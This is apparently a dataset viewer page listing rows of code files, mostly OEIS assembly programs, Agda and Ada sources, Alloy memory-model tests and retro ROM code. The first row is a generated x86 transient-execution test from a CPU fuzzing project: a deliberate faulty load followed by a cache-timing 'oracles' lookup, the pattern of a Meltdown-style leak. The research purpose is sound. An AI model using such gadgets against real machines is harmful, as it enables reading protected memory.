NLTuan/starcoderdata · Datasets at Hugging Face

max_stars_repo_path stringlengths 4 261	max_stars_repo_name stringlengths 6 106	max_stars_count int64 0 38.8k	id stringlengths 1 6	text stringlengths 7 1.05M
Transynther/x86/_processed/NONE/_xt_sm_/i3-7100_9_0x84_notsx.log_1_1260.asm	ljhsiun2/medusa	9	16898	.global s_prepare_buffers s_prepare_buffers: push %r11 push %r14 push %r15 push %r8 push %rbp push %rcx push %rdi push %rsi lea addresses_normal_ht+0x412b, %r15 nop nop nop nop nop cmp %r11, %r11 mov $0x6162636465666768, %r14 movq %r14, (%r15) nop nop nop add $47935, %r8 lea addresses_normal_ht+0x153e4, %rsi lea addresses_WT_ht+0x727, %rdi nop nop nop cmp %rbp, %rbp mov $80, %rcx rep movsw nop nop nop nop nop xor %r8, %r8 lea addresses_A_ht+0x8857, %r15 nop nop dec %rdi mov (%r15), %r11w nop nop nop nop dec %rbp lea addresses_WT_ht+0x1ce17, %rsi lea addresses_UC_ht+0x1427, %rdi clflush (%rdi) nop add $41785, %r8 mov $23, %rcx rep movsl sub $27866, %r14 lea addresses_normal_ht+0x11008, %rsi lea addresses_D_ht+0x1b5a, %rdi nop nop nop sub $20527, %r8 mov $74, %rcx rep movsq nop nop nop nop nop xor %rbp, %rbp lea addresses_D_ht+0x9627, %rbp nop nop nop nop nop cmp $63361, %rsi movb $0x61, (%rbp) nop nop nop nop sub $49555, %r15 lea addresses_D_ht+0x1efa7, %rsi lea addresses_UC_ht+0x19a27, %rdi nop nop nop nop add $9625, %r15 mov $98, %rcx rep movsw nop nop nop xor $60328, %r11 lea addresses_A_ht+0x17daf, %rsi nop nop nop nop nop cmp $37316, %r14 movb $0x61, (%rsi) nop nop nop nop nop xor $49862, %r11 lea addresses_A_ht+0x1003f, %r15 add %rsi, %rsi movb $0x61, (%r15) nop nop add $7232, %rdi pop %rsi pop %rdi pop %rcx pop %rbp pop %r8 pop %r15 pop %r14 pop %r11 ret .global s_faulty_load s_faulty_load: push %r11 push %r12 push %r13 push %r14 push %r15 push %rbp push %rdi // Store lea addresses_D+0x8a17, %r14 nop nop nop nop and %rdi, %rdi mov $0x5152535455565758, %r11 movq %r11, %xmm2 vmovups %ymm2, (%r14) nop nop nop nop nop sub %r12, %r12 // Store lea addresses_UC+0x1f1ff, %rdi nop nop inc %rbp movb $0x51, (%rdi) // Exception!!! nop nop mov (0), %rdi nop sub $8346, %r13 // Store lea addresses_A+0x1dda3, %rdi nop inc %r15 mov $0x5152535455565758, %rbp movq %rbp, (%rdi) nop nop nop sub $49741, %r11 // Load lea addresses_D+0x166d4, %rbp clflush (%rbp) nop nop inc %r11 mov (%rbp), %r13 nop dec %r14 // Store lea addresses_WT+0x2557, %r14 nop nop nop nop xor $50496, %r13 movb $0x51, (%r14) cmp %rdi, %rdi // Store lea addresses_A+0x1de27, %rbp nop add %r14, %r14 movl $0x51525354, (%rbp) nop dec %r11 // Faulty Load lea addresses_A+0x1de27, %r15 cmp %r13, %r13 mov (%r15), %r14w lea oracles, %r13 and $0xff, %r14 shlq $12, %r14 mov (%r13,%r14,1), %r14 pop %rdi pop %rbp pop %r15 pop %r14 pop %r13 pop %r12 pop %r11 ret /* <gen_faulty_load> [REF] {'src': {'type': 'addresses_A', 'same': False, 'size': 32, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_D', 'same': False, 'size': 32, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_UC', 'same': False, 'size': 1, 'congruent': 3, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_A', 'same': False, 'size': 8, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'src': {'type': 'addresses_D', 'same': False, 'size': 8, 'congruent': 0, 'NT': True, 'AVXalign': False}, 'OP': 'LOAD'} {'dst': {'type': 'addresses_WT', 'same': False, 'size': 1, 'congruent': 4, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_A', 'same': True, 'size': 4, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} [Faulty Load] {'src': {'type': 'addresses_A', 'same': True, 'size': 2, 'congruent': 0, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} <gen_prepare_buffer> {'dst': {'type': 'addresses_normal_ht', 'same': False, 'size': 8, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'src': {'type': 'addresses_normal_ht', 'congruent': 0, 'same': False}, 'dst': {'type': 'addresses_WT_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM'} {'src': {'type': 'addresses_A_ht', 'same': False, 'size': 2, 'congruent': 4, 'NT': False, 'AVXalign': False}, 'OP': 'LOAD'} {'src': {'type': 'addresses_WT_ht', 'congruent': 3, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 8, 'same': False}, 'OP': 'REPM'} {'src': {'type': 'addresses_normal_ht', 'congruent': 0, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 0, 'same': False}, 'OP': 'REPM'} {'dst': {'type': 'addresses_D_ht', 'same': False, 'size': 1, 'congruent': 11, 'NT': False, 'AVXalign': True}, 'OP': 'STOR'} {'src': {'type': 'addresses_D_ht', 'congruent': 7, 'same': True}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 10, 'same': False}, 'OP': 'REPM'} {'dst': {'type': 'addresses_A_ht', 'same': False, 'size': 1, 'congruent': 2, 'NT': False, 'AVXalign': False}, 'OP': 'STOR'} {'dst': {'type': 'addresses_A_ht', 'same': False, 'size': 1, 'congruent': 3, 'NT': True, 'AVXalign': False}, 'OP': 'STOR'} {'54': 1} 54 */
init.asm	adkennan/BurgerMayhem	0	169769	INIT_SYSTEM lda #GS_TITLE sta G_GAME_STATE jsr FADE_OUT jsr CLEAR_SCREEN sei ; Disable Kernal and Basic ROM lda #CPUPORT_VAL sta CPUPORT ; Set up our own interrupt handler lda #<IRQ sta NMISR sta ISR lda #>IRQ sta NMISR sta ISR ; Clear CIA timers lda #DXICR_CLEAR sta D1ICR sta D2ICR lda D1ICR lda D2ICR cli ; Hide border garbage lda #$FF sta BORDER_PAT_LOC ; Switch to video bank 1 lda #D2PRA_BANK1 sta D2PRA rts IRQ rti
gdb/testsuite/gdb.ada/scalar_storage/storage.adb	greyblue9/binutils-gdb	1	3164	-- Copyright 2019-2021 Free Software Foundation, Inc. -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 3 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program. If not, see <http://www.gnu.org/licenses/>. with Pck; use Pck; with System.Storage_Elements; use System.Storage_Elements; procedure Storage is subtype Some_Range is Natural range 0..127; subtype Another_Range is Natural range 0..15; type Rec is record Value : Some_Range; Another_Value : Another_Range; end record; for Rec use record Value at 0 range 0..6; Another_Value at 0 range 7..10; end record; type Rec_LE is new Rec; for Rec_LE'Bit_Order use System.Low_Order_First; for Rec_LE'Scalar_Storage_Order use System.Low_Order_First; type Rec_BE is new Rec; for Rec_BE'Bit_Order use System.High_Order_First; for Rec_BE'Scalar_Storage_Order use System.High_Order_First; V_LE : Rec_LE; V_BE : Rec_BE; begin V_LE := (126, 12); V_BE := (126, 12); Do_Nothing (V_LE'Address); -- START Do_Nothing (V_BE'Address); end Storage;
programs/oeis/080/A080923.asm	neoneye/loda	22	177703	; A080923: First differences of A003946. ; 1,3,8,24,72,216,648,1944,5832,17496,52488,157464,472392,1417176,4251528,12754584,38263752,114791256,344373768,1033121304,3099363912,9298091736,27894275208,83682825624,251048476872,753145430616,2259436291848,6778308875544,20334926626632,61004779879896,183014339639688,549043018919064,1647129056757192,4941387170271576,14824161510814728,44472484532444184,133417453597332552,400252360791997656,1200757082375992968,3602271247127978904,10806813741383936712,32420441224151810136,97261323672455430408,291783971017366291224,875351913052098873672,2626055739156296621016,7878167217468889863048,23634501652406669589144,70903504957220008767432,212710514871660026302296,638131544614980078906888,1914394633844940236720664,5743183901534820710161992,17229551704604462130485976,51688655113813386391457928,155065965341440159174373784,465197896024320477523121352,1395593688072961432569364056,4186781064218884297708092168,12560343192656652893124276504,37681029577969958679372829512,113043088733909876038118488536,339129266201729628114355465608,1017387798605188884343066396824,3052163395815566653029199190472,9156490187446699959087597571416,27469470562340099877262792714248,82408411687020299631788378142744,247225235061060898895365134428232,741675705183182696686095403284696,2225027115549548090058286209854088,6675081346648644270174858629562264,20025244039945932810524575888686792,60075732119837798431573727666060376,180227196359513395294721182998181128,540681589078540185884163548994543384 mov $1,3 pow $1,$0 mul $1,8 div $1,3 sub $1,1 div $1,3 add $1,1 mov $0,$1
libsrc/_DEVELOPMENT/adt/b_vector/c/sccz80/b_vector_at.asm	meesokim/z88dk	0	81130	; int b_vector_at(b_vector_t *v, size_t idx) SECTION code_adt_b_vector PUBLIC b_vector_at EXTERN b_array_at defc b_vector_at = b_array_at
src/sound/alarm_musics/alarm_one/channel3.asm	Gegel85/RunnerGB	0	1496	musicChan3AlarmOneTheme:: repeat 4 setRegisters $80, $00, $00, $AC, $85 stopMusic continue .loop: wait 0 jump .loop
generated/simple_webapps-commands-append_servers-server_hash.adb	faelys/simple-webapps	1	17976	<filename>generated/simple_webapps-commands-append_servers-server_hash.adb<gh_stars>1-10 with Interfaces; use Interfaces; package body Simple_Webapps.Commands.Append_Servers.Server_Hash is P : constant array (0 .. 1) of Natural := (1, 11); T1 : constant array (0 .. 1) of Unsigned_8 := (10, 12); T2 : constant array (0 .. 1) of Unsigned_8 := (15, 5); G : constant array (0 .. 15) of Unsigned_8 := (0, 0, 0, 0, 0, 1, 0, 0, 2, 0, 0, 3, 4, 0, 4, 0); function Hash (S : String) return Natural is F : constant Natural := S'First - 1; L : constant Natural := S'Length; F1, F2 : Natural := 0; J : Natural; begin for K in P'Range loop exit when L < P (K); J := Character'Pos (S (P (K) + F)); F1 := (F1 + Natural (T1 (K)) * J) mod 16; F2 := (F2 + Natural (T2 (K)) * J) mod 16; end loop; return (Natural (G (F1)) + Natural (G (F2))) mod 7; end Hash; end Simple_Webapps.Commands.Append_Servers.Server_Hash;
programs/oeis/234/A234046.asm	jmorken/loda	1	87936	; A234046: Period 7: repeat [0, 1, -1, 0, 0, -1, 1]. ; 0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1,0,1,-1,0,0,-1,1 lpb $0 sub $0,7 lpe pow $0,2 lpb $0 div $0,9 sub $0,1 lpe mov $1,$0
src/test/java/com/anqiansong/Antlr.g4	anqiansong/CommentShell	8	2385	grammar Antlr; //x:generate echo hello g4
alloy4fun_models/trashltl/models/19/5NdBmFo62S4zckgT4.als	Kaixi26/org.alloytools.alloy	0	3425	<gh_stars>0 open main pred id5NdBmFo62S4zckgT4_prop20 { always all t: File \| t not in Protected since t in Trash } pred __repair { id5NdBmFo62S4zckgT4_prop20 } check __repair { id5NdBmFo62S4zckgT4_prop20 <=> prop20o }
programs/oeis/211/A211322.asm	jmorken/loda	1	163698	; A211322: Number of (n+1) X (n+1) -3..3 symmetric matrices with every 2 X 2 subblock having sum zero and one or two distinct values. ; 11,15,21,31,47,73,115,183,293,471,759,1225,1979,3199,5173,8367,13535,21897,35427,57319,92741,150055,242791,392841,635627,1028463,1664085,2692543,4356623,7049161,11405779,18454935,29860709,48315639,78176343,126491977,204668315,331160287,535828597,866988879,1402817471,2269806345,3672623811,5942430151,9615053957,15557484103,25172538055,40730022153,65902560203,106632582351,172535142549,279167724895,451702867439,730870592329,1182573459763,1913444052087,3096017511845,5009461563927,8105479075767,13114940639689,21220419715451,34335360355135,55555780070581,89891140425711,145446920496287,235338060921993,380784981418275,616123042340263,996908023758533,1613031066098791,2609939089857319,4222970155956105,6832909245813419 mov $1,6 mov $2,4 lpb $0 sub $0,1 mov $3,$2 mov $2,$1 add $1,$3 lpe add $1,5
RefactorAgdaEngine/Test/Tests/input/ExtractCaseSplit.agda	omega12345/RefactorAgda	5	13648	module ExtractCaseSplit where open import Data.Maybe open import Agda.Builtin.Bool not : Bool -> Bool not true = false not false = true func : Maybe Bool -> Bool func nothing = false func (just x) = not x open import Data.List func2 : List Bool -> Bool func2 [] = true func2 (x ∷ x₁) = not (func2 x₁)
programs/oeis/088/A088227.asm	neoneye/loda	22	25501	; A088227: Solutions x to x^n == 7 mod 13. ; 2,6,7,11,15,19,20,24,28,32,33,37,41,45,46,50,54,58,59,63,67,71,72,76,80,84,85,89,93,97,98,102,106,110,111,115,119,123,124,128,132,136,137,141,145,149,150,154,158,162,163,167,171,175,176,180,184,188,189,193 mov $1,$0 add $1,2 div $1,4 sub $1,$0 sub $0,$1 mov $2,$1 mul $2,2 sub $2,$0 mov $0,2 sub $0,$2
OldBasicILP/Syntax/Translation.agda	mietek/hilbert-gentzen	29	1814	<filename>OldBasicILP/Syntax/Translation.agda module OldBasicILP.Syntax.Translation where open import Common.Context public import OldBasicILP.Syntax.ClosedHilbertSequential as CHS import OldBasicILP.Syntax.ClosedHilbert as CH -- Translation from closed Hilbert-style sequential to closed Hilbert-style. mutual chsᵀ→chᵀ : CHS.Ty → CH.Ty chsᵀ→chᵀ (CHS.α P) = CH.α P chsᵀ→chᵀ (A CHS.▻ B) = chsᵀ→chᵀ A CH.▻ chsᵀ→chᵀ B chsᵀ→chᵀ (p CHS.⦂ A) = chsᴾ→chᴾ p CH.⦂ chsᵀ→chᵀ A chsᵀ→chᵀ (A CHS.∧ B) = chsᵀ→chᵀ A CH.∧ chsᵀ→chᵀ B chsᵀ→chᵀ CHS.⊤ = CH.⊤ chsᴾ→chᴾ : ∀ {Ξ A} → CHS.Proof Ξ A → CH.Proof (chsᵀ→chᵀ A) chsᴾ→chᴾ CHS.[ d ] = CH.[ chsᴰ→ch d top ] chsᴰ→ch : ∀ {Ξ A} → CHS.⊢ᴰ Ξ → A ∈ Ξ → CH.⊢ (chsᵀ→chᵀ A) chsᴰ→ch (CHS.mp i j d) top = CH.app (chsᴰ→ch d i) (chsᴰ→ch d j) chsᴰ→ch (CHS.ci d) top = CH.ci chsᴰ→ch (CHS.ck d) top = CH.ck chsᴰ→ch (CHS.cs d) top = CH.cs chsᴰ→ch (CHS.nec `d d) top = CH.box (chsᴰ→ch `d top) chsᴰ→ch (CHS.cdist {Ξ} {A} {B} {`Ξ₁} {`Ξ₂} {`d₁} {`d₂} d) top = oops {A} {B} {`Ξ₁} {`Ξ₂} {`d₁} {`d₂} chsᴰ→ch (CHS.cup d) top = CH.cup chsᴰ→ch (CHS.cdown d) top = CH.cdown chsᴰ→ch (CHS.cpair d) top = CH.cpair chsᴰ→ch (CHS.cfst d) top = CH.cfst chsᴰ→ch (CHS.csnd d) top = CH.csnd chsᴰ→ch (CHS.unit d) top = CH.unit chsᴰ→ch (CHS.mp i j d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.ci d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.ck d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.cs d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.nec `d d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.cdist d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.cup d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.cdown d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.cpair d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.cfst d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.csnd d) (pop k) = chsᴰ→ch d k chsᴰ→ch (CHS.unit d) (pop k) = chsᴰ→ch d k -- FIXME: I can’t even postulate this. -- postulate -- ᴬlem₁ : ∀ {Ξ₁ Ξ₂ A B} {d₁ : CHS.⊢ᴰ Ξ₁ , A CHS.▻ B} {d₂ : CHS.⊢ᴰ Ξ₂ , A} -- → chsᴰ→ch (CHS.appᴰ d₁ d₂) ≡ CH.app (chsᴰ→ch d₁ top) (chsᴰ→ch d₂ top) postulate oops : ∀ {A B Ξ₁ Ξ₂} {d₁ : CHS.⊢ᴰ Ξ₁ , A CHS.▻ B} {d₂ : CHS.⊢ᴰ Ξ₂ , A} → CH.⊢ chsᴾ→chᴾ CHS.[ d₁ ] CH.⦂ (chsᵀ→chᵀ A CH.▻ chsᵀ→chᵀ B) CH.▻ chsᴾ→chᴾ CHS.[ d₂ ] CH.⦂ chsᵀ→chᵀ A CH.▻ chsᴾ→chᴾ CHS.[ CHS.appᴰ d₁ d₂ ] CH.⦂ chsᵀ→chᵀ B chs→ch : ∀ {A} → CHS.⊢ A → CH.⊢ (chsᵀ→chᵀ A) chs→ch (Ξ , d) = chsᴰ→ch d top -- Translation from closed Hilbert-style to closed Hilbert-style sequential. mutual chᵀ→chsᵀ : CH.Ty → CHS.Ty chᵀ→chsᵀ (CH.α P) = CHS.α P chᵀ→chsᵀ (A CH.▻ B) = chᵀ→chsᵀ A CHS.▻ chᵀ→chsᵀ B chᵀ→chsᵀ (p CH.⦂ A) with chᴾ→chsᴾ p chᵀ→chsᵀ (p CH.⦂ A) \| (Ξ , p′) = p′ CHS.⦂ chᵀ→chsᵀ A chᵀ→chsᵀ (A CH.∧ B) = chᵀ→chsᵀ A CHS.∧ chᵀ→chsᵀ B chᵀ→chsᵀ CH.⊤ = CHS.⊤ chᴾ→chsᴾ : ∀ {A} → CH.Proof A → ∃ (λ Ξ → CHS.Proof Ξ (chᵀ→chsᵀ A)) chᴾ→chsᴾ CH.[ d ] with ch→chs d chᴾ→chsᴾ CH.[ d ] \| (Ξ , d′) = Ξ , CHS.[ d′ ] ch→chs : ∀ {A} → CH.⊢ A → CHS.⊢ (chᵀ→chsᵀ A) ch→chs (CH.app d₁ d₂) = CHS.app (ch→chs d₁) (ch→chs d₂) ch→chs CH.ci = ∅ , CHS.ci CHS.nil ch→chs CH.ck = ∅ , CHS.ck CHS.nil ch→chs CH.cs = ∅ , CHS.cs CHS.nil ch→chs (CH.box d) = CHS.box (ch→chs d) ch→chs CH.cdist = ∅ , CHS.cdist CHS.nil ch→chs CH.cup = ∅ , CHS.cup CHS.nil ch→chs CH.cdown = ∅ , CHS.cdown CHS.nil ch→chs CH.cpair = ∅ , CHS.cpair CHS.nil ch→chs CH.cfst = ∅ , CHS.cfst CHS.nil ch→chs CH.csnd = ∅ , CHS.csnd CHS.nil ch→chs CH.unit = ∅ , CHS.unit CHS.nil
src/Categories/Category/Monoidal/Bundle.agda	Trebor-Huang/agda-categories	279	8786	{-# OPTIONS --without-K --safe #-} -- Bundled version of Monoidal Category module Categories.Category.Monoidal.Bundle where open import Level open import Categories.Category.Core using (Category) open import Categories.Category.Monoidal.Core using (Monoidal) open import Categories.Category.Monoidal.Braided using (Braided) open import Categories.Category.Monoidal.Symmetric using (Symmetric) record MonoidalCategory o ℓ e : Set (suc (o ⊔ ℓ ⊔ e)) where field U : Category o ℓ e monoidal : Monoidal U open Category U public open Monoidal monoidal public record BraidedMonoidalCategory o ℓ e : Set (suc (o ⊔ ℓ ⊔ e)) where field U : Category o ℓ e monoidal : Monoidal U braided : Braided monoidal monoidalCategory : MonoidalCategory o ℓ e monoidalCategory = record { U = U ; monoidal = monoidal } open Category U public open Braided braided public record SymmetricMonoidalCategory o ℓ e : Set (suc (o ⊔ ℓ ⊔ e)) where field U : Category o ℓ e monoidal : Monoidal U symmetric : Symmetric monoidal open Category U public open Symmetric symmetric public braidedMonoidalCategory : BraidedMonoidalCategory o ℓ e braidedMonoidalCategory = record { U = U ; monoidal = monoidal ; braided = braided } open BraidedMonoidalCategory braidedMonoidalCategory public using (monoidalCategory)
oeis/024/A024908.asm	neoneye/loda-programs	11	103095	; A024908: Numbers k such that 9*k - 5 is prime. ; Submitted by <NAME> ; 2,4,8,12,16,18,22,24,26,32,38,42,46,52,56,64,68,72,74,82,84,86,88,92,96,98,108,114,116,122,126,134,138,144,148,154,156,162,164,166,172,176,178,186,192,194,196,198,204,208,222,224,226,232,238,254,264,266,284,296,298,302,304,306,308,312,318,334,336,338,346,352,354,358,362,364,368,372,374,382,386,394,396,402,404,416,422,428,436,448,456,462,472,474,478,492,494,502,506,508 mov $1,4 mov $2,$0 add $2,2 pow $2,2 lpb $2 add $1,8 sub $2,1 mov $3,$1 seq $3,10051 ; Characteristic function of primes: 1 if n is prime, else 0. sub $0,$3 add $1,10 mov $4,$0 max $4,0 cmp $4,$0 mul $2,$4 lpe mov $0,$1 sub $0,22 div $0,9 add $0,2
case-studies/performance/verification/alloy/ppc/tests/podrr005.als	uwplse/memsynth	19	2302	<filename>case-studies/performance/verification/alloy/ppc/tests/podrr005.als<gh_stars>10-100 module tests/podrr005 open program open model / PPC podrr005 "Fre SyncsWW Rfe SyncdRW Rfe SyncdRW Rfe PodRR" Cycle=Fre SyncsWW Rfe SyncdRW Rfe SyncdRW Rfe PodRR Relax=PodRR Safe=Fre BCSyncsWW BCSyncdRW { 0:r2=z; 1:r2=z; 1:r4=x; 2:r2=x; 2:r4=y; 3:r2=y; 3:r4=z; } P0 \| P1 \| P2 \| P3 ; li r1,1 \| lwz r1,0(r2) \| lwz r1,0(r2) \| lwz r1,0(r2) ; stw r1,0(r2) \| sync \| sync \| lwz r3,0(r4) ; sync \| li r3,1 \| li r3,1 \| ; li r3,2 \| stw r3,0(r4) \| stw r3,0(r4) \| ; stw r3,0(r2) \| \| \| ; exists (z=2 /\ 1:r1=2 /\ 2:r1=1 /\ 3:r1=1 /\ 3:r3=0) / one sig x, y, z extends Location {} one sig P1, P2, P3, P4 extends Processor {} one sig op1 extends Write {} one sig op2 extends Sync {} one sig op3 extends Write {} one sig op4 extends Read {} one sig op5 extends Sync {} one sig op6 extends Write {} one sig op7 extends Read {} one sig op8 extends Sync {} one sig op9 extends Write {} one sig op10 extends Read {} one sig op11 extends Read {} fact { P1.write[1, op1, z, 1] P1.sync[2, op2] P1.write[3, op3, z, 2] P2.read[4, op4, z, 2] P2.sync[5, op5] P2.write[6, op6, x, 1] P3.read[7, op7, x, 1] P3.sync[8, op8] P3.write[9, op9, y, 1] P4.read[10, op10, y, 1] P4.read[11, op11, z, 0] } fact { z.final[2] } Allowed: run { Allowed_PPC } for 5 int expect 1
rom/keyboard.asm	hisahi/ellipse1100	0	161816	<gh_stars>0 ; Ellipse Workstation 1100 (fictitious computer) ; ROM code (keyboard code) ; ; Copyright (c) 2020 <NAME> (hisahi) ; ; Permission is hereby granted, free of charge, to any person obtaining a copy ; of this software and associated documentation files (the "Software"), to deal ; in the Software without restriction, including without limitation the rights ; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell ; copies of the Software, and to permit persons to whom the Software is ; furnished to do so, subject to the following conditions: ; ; The above copyright notice and this permission notice shall be included in all ; copies or substantial portions of the Software. ; ; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR ; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, ; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE ; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER ; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, ; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE ; SOFTWARE. ; ; Written for the WLA-DX assembler ; .BANK 1 .ORG $4000 .DEFINE KEYBIO $7010 ; KEYCODETABLE, KEYB_APPLY_CAPS_TO_KEY in keytbls.asm .DEFINE KEYB_TMP_NMI $0EEA .DEFINE KEYB_NMI_TIMER $0EEC .DEFINE KEYB_TMP3 $0EEE .DEFINE KEYB_TMP2 $0EF0 .DEFINE KEYB_KEYDOWNX $0EF2 .DEFINE KEYB_TMP $0EF4 .DEFINE KEYB_NEWKEYPRESSED $0EF8 .DEFINE KEYB_NEWKEYPRESSEDL ($800000\|KEYB_NEWKEYPRESSED) .DEFINE KEYB_KEYDOWNTICKS $0EFA .DEFINE KEYB_KEYMODIFIER1 $0EFC ; SC------ (shift, caps) .DEFINE KEYB_KEYMODIFIER2 $0EFD ; CA------ (ctrl, alt) .DEFINE KEYB_KEYDOWN $0EFE .DEFINE KEYB_KEYDOWNL ($800000\|KEYB_KEYDOWN) ; characters .DEFINE KEYB_KEYCACHE $0F00 .MACRO ENTERKEYBRAM PHB PHD ACC8 LDA #$00 PHA PLB ACC16 LDA #$0E00 TCD .ENDM .MACRO EXITKEYBRAM PLD PLB .ENDM ; get currently pressed key in A ; supply value in A to check key repeat (higher value to repeat slower) ; supply value in X to apply new repeat value (if A=12, X=10 ; means 2 ticks to repeat again) ; carry set if it is a new key ; A is set to be 8-bit! KEYB_GET_PRESSED_KEY: ACC8 CMP $800000\|KEYB_KEYDOWNTICKS.L BCS + TXA STA $800000\|KEYB_KEYDOWNTICKS.L SEC BRA ++ + LDA KEYB_NEWKEYPRESSEDL.L ASL A ++ LDA KEYB_KEYDOWNL.L RTS ; reset key data KEYB_RESET_BUFFER: PHP AXY16 ENTERKEYBRAM STZ KEYB_KEYMODIFIER1.W STZ KEYB_KEYDOWN.W STZ KEYB_KEYDOWNTICKS.W STZ TEXT_CURSORTICKS.W STZ KEYB_KEYDOWNX.W DEC KEYB_KEYDOWNX.W EXITKEYBRAM PLP RTS KEYB_INC_NMI_TIMER: PHP ACC8 LDA #$01 STA KEYB_NMI_TIMER.L PLP RTS ; returns A 00000000ScCA0000 ; Shift, caps, Ctrl, Alt KEYB_GET_MODIFIERS: PHP ACC16 LDA #0 ACC8 LDA $800000\|KEYB_KEYMODIFIER2.L LSR A LSR A ORA $800000\|KEYB_KEYMODIFIER2.L PLP RTS KEYB_UPDATE_KEYS: PHP AXY16 ENTERKEYBRAM DEC KEYB_NMI_TIMER&$FF.B BRA KEYB_UPDATE_KEYS_IMMEDIATE@INNER ; updates key buffers ; X, Y preserved, A clobbered KEYB_UPDATE_KEYS_IMMEDIATE: PHP AXY16 ENTERKEYBRAM @INNER: PHX PHY STZ KEYB_NEWKEYPRESSED&$FF.B ; set "new key pressed" to 0 STZ KEYB_KEYMODIFIER1&$FF.B ; also KEYB_KEYMODIFIER2 LDA #0 ACC8 LDA KEYB_NMI_TIMER&$FF.B STA KEYB_TMP_NMI&$FF.B ; update modifiers (Ctrl, Shift, Alt, caps) LDA KEYBIO.W ; bit 3 = Ctrl, bit 4 = LSh, ; bit 5 = Caps ASL A ASL A ASL A BCC @NOCAPS ; C = caps PHA LDA KEYB_KEYMODIFIER1&$FF.B ORA #$40 ; caps: KM1 \|= 0x40 STA KEYB_KEYMODIFIER1&$FF.B PLA @NOCAPS: ASL A BCC @NOLSHIFT ; C = left shift PHA LDA KEYB_KEYMODIFIER1&$FF.B ORA #$80 ; shift: KM1 \|= 0x80 STA KEYB_KEYMODIFIER1&$FF.B PLA @NOLSHIFT: ASL A BCC @NOCTRL ; C = ctrl LDA KEYB_KEYMODIFIER2&$FF.B ORA #$80 ; ctrl: KM2 \|= 0x80 STA KEYB_KEYMODIFIER2&$FF.B @NOCTRL: LDA KEYBIO+1.W ; bit 5 = LAlt AND #$20 BEQ @NOLALT LDA KEYB_KEYMODIFIER2&$FF.B ORA #$40 ; alt: KM2 \|= 0x40 STA KEYB_KEYMODIFIER2&$FF.B BRA @NORALT @NOLALT: LDA KEYBIO+11 ; bit 5 = RAlt AND #$20 BEQ @NORALT LDA KEYB_KEYMODIFIER2&$FF.B ORA #$40 ; alt: KM2 \|= 0x40 STA KEYB_KEYMODIFIER2&$FF.B @NORALT: LDA KEYBIO+13 ; bit 4 = Rshift AND #$10 BEQ @NORSHIFT LDA KEYB_KEYMODIFIER1&$FF.B ORA #$80 ; shift: KM1 \|= 0x80 STA KEYB_KEYMODIFIER1&$FF.B @NORSHIFT: ; update main keyboard cache ACC8 LDX #15 @KEYLOOP: STX KEYB_TMP3&$FF.B LDA KEYBIO.W,X ; load A with key matrix value TAY TXA ; \ ASL A ; \| ASL A ; \| ASL A ; \| TAX ; / X = X << 3 STX KEYB_TMP2&$FF.B TYA .REPEAT 8 LSR A ; move lowest bit to C STA KEYB_TMP&$FF.B ; save old A (remaining bits) BIT KEYB_KEYMODIFIER1&$FF.B ; check if CAPS applies BVC + ; move to (next) + if no caps LDA KEYB_APPLY_CAPS_TO_KEY.W,X ; <>$00 if caps should matter BEQ + ; else skip to (next) + TXA ; \ EOR #$80 ; \| X ^= 0x80 TAX ; / + BIT KEYB_KEYMODIFIER1&$FF.B ; check if SHIFT applies BPL + ; move to (next) + if no shift TXA ; \ EOR #$80 ; \| X ^= 0x80 TAX ; / + LDA KEYCODETABLE.W,X ; load key's ASCII code BEQ ++++ ; if 0, skip to store... TAY ; ...else put it in Y LDX KEYB_TMP2&$FF.B ; restore original shifted X LDA #0 ; storing #0 to cache if key up ; the next instruction checks C which should still have the lowest bit BCC +++ ; key is not down? go to +++ DEC A ; A = #$FF. key is down CPY #$0080 ; if Y >= $0080 BCS ++++ ; skip to cache store (++++) CPX KEYB_KEYDOWNX&$FF.B ; is "current key" this key? BEQ + 